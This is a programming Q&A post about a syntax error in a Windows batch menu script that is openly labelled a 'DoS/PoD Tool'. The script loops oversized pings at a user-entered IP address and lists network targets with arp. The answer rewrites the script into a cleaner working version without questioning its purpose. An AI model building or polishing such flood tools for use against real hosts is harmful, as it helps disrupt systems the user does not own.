# Incorrect syntax when asking for user input

Tags: batch-file, input, cmd

I am trying to make a quick program in Batch that asks for user input, but when i get to the input part, the script exits with error:

> The syntax of the command is incorrect.

This is my code:

```
@echo off
color 0a
title WinDoS/PoD- 0.1
echo Automatic DoS/PoD Tool
echo Select what you want to do.
echo 1. Attack
echo 2. Instructions
echo 3. IP Getter
echo 4. IP Searcher
echo 5. Exit
set /p userchoice=
if %userchoice% == 1 
goto attack
if %userchoice% == 2
goto instructions
if %userchoice% == 3
goto getter
if %userchoice% == 4
goto searcher
if %userchoice% == 5
exit

:searcher
arp -a
pause

:attack
echo Enter IP adress to attack
set /p address=
goto sequence

:sequence
ping %address% -l 65500 -w 1 -n 1
goto sequence

:instructions
echo WinDoS/PoD Instructions
echo WinDoS/PoD is a program that allows you to perform Denial Of Service (DoS) attacks using a method known as Ping Of Death (PoD)
echo Press 1 on the home menu to enter the attacker program.
echo Input an ip address to DoS
echo If you don't know the IP address to a site, use the built in getter.
echo If you want to view all available network targets, use the built in searcher.
pause

:getter
echo Website (full link):
set /p %website%=
tracert %website%
pause
```

What is wrong with the syntax?

Comment: Your `%userchoice%` comparisons seem to be against a number with a trailing space, I'm sure this isn't intended. You have some unterminating labels, which means upon completion of those labels, the next label will begin, _(that's probably unintended too)_.Additionally you have an incorrect `Set /P` command inside the `getter` label, it should read `set /p website=`, not `set /p %website%=`.

Comment: Open a command prompt window, type `if /?` and read the help text; do the same thing for other commands as well...

Answer (score 0):

You're using the wrong command for choosing a known list item, you should be using `choice`, not `set`.

Here's an example using your provided information as its basis:

```
@Echo Off
Color 0A
Title WinDoS/PoD- 0.1

:Menu
Echo(
Echo Automatic DoS/PoD Tool
Echo(
Echo    Home Menu
Echo(
Echo 1. Attack
Echo 2. Instructions
Echo 3. IP Getter
Echo 4. IP Searcher
Echo 5. Exit
Echo(

%__AppDir__%choice.exe /C 12345 /N /M "Select a Home Menu item number>"
If ErrorLevel 5 GoTo :EOF
If ErrorLevel 4 GoTo Searcher
If ErrorLevel 3 GoTo Getter
If ErrorLevel 2 GoTo Instructions

:Attack
ClS
Set /P "address=Enter IP address to attack> "

:Sequence
%__AppDir__%ping.exe %address% -l 65500 -w 1 -n 1
GoTo Sequence

:Instructions
ClS
Echo WinDoS/PoD Instructions
Echo(
Echo This program allows you to perform Denial Of Service (DoS) attacks,
Echo  using a method known as Ping Of Death (PoD).
Echo(
Echo Press 1 on the Home Menu to begin the Attack program.
Echo Input an IP address to DoS
Echo If you don't know the IP address for a site, use the built-in Getter.
Echo If you want to view all available network targets, use the built-in Searcher.
Echo(
Pause
GoTo Menu

:Getter
ClS
Set /P "website=Website (full link)> "
%__AppDir__%tracert.exe %website%
Pause
GoTo Menu

:Searcher
ClS
%__AppDir__%arp.exe -a
Pause
GoTo Menu
```

*Please note, that I have not looked at the usage of any of your commands, I have offered only improvements to the layout and functionality.*